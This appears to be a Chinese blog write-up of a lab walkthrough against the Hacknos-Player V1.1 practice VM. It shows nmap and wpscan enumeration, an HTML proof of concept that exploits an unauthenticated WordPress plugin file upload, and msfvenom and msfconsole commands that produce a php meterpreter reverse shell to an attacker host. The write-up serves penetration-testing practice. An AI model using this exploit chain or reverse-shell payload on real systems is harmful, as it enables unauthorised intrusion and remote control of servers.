首页 > 其他分享 >Hacknos-Player V1.1打靶渗透【附POC】

Hacknos-Player V1.1打靶渗透【附POC】

时间:2024-07-12 19:28:34浏览次数:12  
标签:web phtml shell http Hacknos 打靶 192.168 V1.1 wp

1. 信息收集:

1.1. 主机扫描

 nmap -sn '192.168.7.0/24'|grep -B 2 '08:00:27:C9:02:09'

1.2. 端口扫描80、3306

nmap -p- 192.168.7.99

1.3. 目录扫描

dirsearch -u 192.168.7.99

1.4. 操作系统等敏感信息查看

2. 漏洞扫描+漏洞利用

2.1. 老规矩,进入主页点击可能存在的功能点

发现不是404,就是无用跳转,无果;-》查看是否存在有信息-》翻找到没文档根目录,拼接从尝试-》对其进行访问使用火狐插件Wappalyzer发现站点为Wordpress5.3.18

2.2. 利用wpscan查找密码

wpscan --url http://ip/g@web -e u

拼接地址进行查找http://IP/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

发现了第一个密码:hackNos@9012!!,尝试在熟知的wordpress框架默认登陆后台wp-login.php进行登录-》无果;

IP/g@web/wp-login.php

2.3. 利用wpscan查找nday漏洞

wpscan --url http://IP/g@web -e vp --api-token 密钥API
#-e vp: 该选项表示 WPScan 将枚举插件(vp 即 vulnerable plugins)的漏洞。
#--api-token 密钥API: 使用 WPScan API Token 进行扫描,这是用来访问 WPScan 在线数据库的密钥,确保扫描结果的准确性和全面性。

密钥可在网站申请Sign Up | WPScan

具体申请流程请移步【5分钟内解决困扰】:《wpscan》免费密钥API申请-CSDN博客

选择其中一个远程代码执行漏洞-》对其提供的网站进行查阅-》复制官方的poc数据包

将下方POC代码存储为POC.html文件-》此处如果是直接复制官网的话,给的是https协议,改成http协议就好;

<form method="post" enctype="multipart/form-data" action="http://漏洞机IP/wp-admin/admin-ajax.php">
	<input type="hidden" name="action" value="wpsp_upload_attachment">
	Choose a file ending with .phtml:
	<input type="file" name="0">
	<input type="submit" value="Submit">
	</form>

	After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

2.4. 获取shell

利用msf创建shell反弹文件-》启动msf监听-》通过刚才生成的POC.html上传shell.phtml文件-》访问shell.phtml文件,反弹shell

####生成后门文件[在攻击机上生成]
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.70 LPORT=4444 x> shell.phtml

####开启监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.70
set LPORT  4444
run
	
####Shell上传页面
http://192.168.7.99/g@web/wp-content/uploads/wpsp/

####调用/bin/bash【最后反弹shell时使用】
python -c 'import pty; pty.spawn("/bin/bash")'
  1. ####生成后门文件【在攻击机上生成】

  1. ####开启监听

  1. 打开POC.html文件,上传shell.phtml文件;

  1. 由于网站会强改上传的文件名称-》通过访问目录-》点击访问shell.php文件-》msf反弹到shell

http://IP/g@web/wp-content/uploads/wpsp/

  1. 获shell

标签:web,phtml,shell,http,Hacknos,打靶,192.168,V1.1,wp
From: https://blog.csdn.net/weixin_52487093/article/details/140387236

相关文章

  • 文字识别 -- eSearch v1.12.1
     软件简介eSearch是一款功能强大的跨平台软件工具,主要功能包括截屏、OCR文字识别、搜索、翻译、贴图、以图搜图以及录屏等。它不仅支持多屏幕、窗口和控件选择、长截屏等高级截屏功能,还支持离线和在线OCR服务,可进行自定义OCR模型和字典设置。此外,eSearch也提供一系列图像编辑......
  • KubeEdge v1.17.0发布!数据处理能力与易用性全面提升
    https://developer.huawei.com/consumer/cn/forum/topic/0207151855682956382 KubeEdgev1.17.0发布!数据处理能力与易用性全面提升软件开发发表于2024-05-2314:08发布于:广东50查看摘要:一文看完新增7个特性功能,为边缘节点和设备带来更强的数据处理能力。本文分享自......
  • httpsok-v1.13.0支持七牛云证书自动部署
    ......
  • httpsok-v1.13.0支持nginx证书部署管理
    ......
  • 浔川计算机v1.1——浔川python科技社
    浔川计算机v1.1importtkinterimportmathimporttkinter.messageboxclassCalculator(object):#界面布局方法def__init__(self):#创建主界面,并且保存到成员属性中self.root=tkinter.Tk()self.root.minsize(280,450)......
  • [工具] 批量BMP图片转为PNG透明图片,去掉BMP黑色背景,去黑底,压缩导出png图片V1.1
    批量BMP图片转为PNG透明图片,去掉BMP黑色背景,压缩导出png图片V1.1前段时间上传了一款bmp转png并去黑底的demo软件,非常受欢迎,  上一版本地址:批量BMP图片转为PNG透明图片,去掉BMP黑色背景应广大爱好者的要求,完善了一下软件的功能,增加了导出png图片压缩功能,界面如下:  压......
  • [工具] 批量BMP图片转为PNG透明图片,去掉BMP黑色背景,去黑底,压缩导出png图片V1.1
    批量BMP图片转为PNG透明图片,去掉BMP黑色背景,压缩导出png图片V1.1前段时间上传了一款bmp转png并去黑底的demo软件,非常受欢迎,  上一版本地址:批量BMP图片转为PNG透明图片,去掉BMP黑色背景应广大爱好者的要求,完善了一下软件的功能,增加了导出png图片压缩功能,界面如下:下载地址请关......
  • 打靶笔记w1r3s.v1.0
    打靶笔记w1r3s.v1.0nmap扫描与分析主机发现nmap-sn192.168.218.0/24历史版本为-sP(已经被放弃)n不进行端口扫描192.168.218.155创建文件夹保存端口信息指定最低1万速率扫描所有端口nmap-sT--min-rate10000-p-192.168.218.155nmapscan/ports-sSSYN扫描是快......
  • imFile下载工具v1.1.0磁力链等资源下载
    imFile是一款全能的下载工具,支持下载HTTP、FTP、BT、磁力链等资源。它的界面简洁易用,最高支持10个任务同时下载,单任务最高支持16线程下载从而提高下载速度。软件特色简洁明了的图形操作界面支持BT和磁力链任务支持选择性下载BT部分文件每天自动更新Tracker服务......
  • 打靶笔记Connect the dots
    信息收集扫描整个c段网段中所有主机是否开机,不会对主机进行端口扫描nmap-sn192.168.218.0/24nmap-sT--min-rate10000-p-192.168.218.153–min-rate每秒最少发多少包,用于提高扫描速度-TTCP连接扫描-oA把扫描结果存储为他所支持的全部文件格式详细扫描nmap......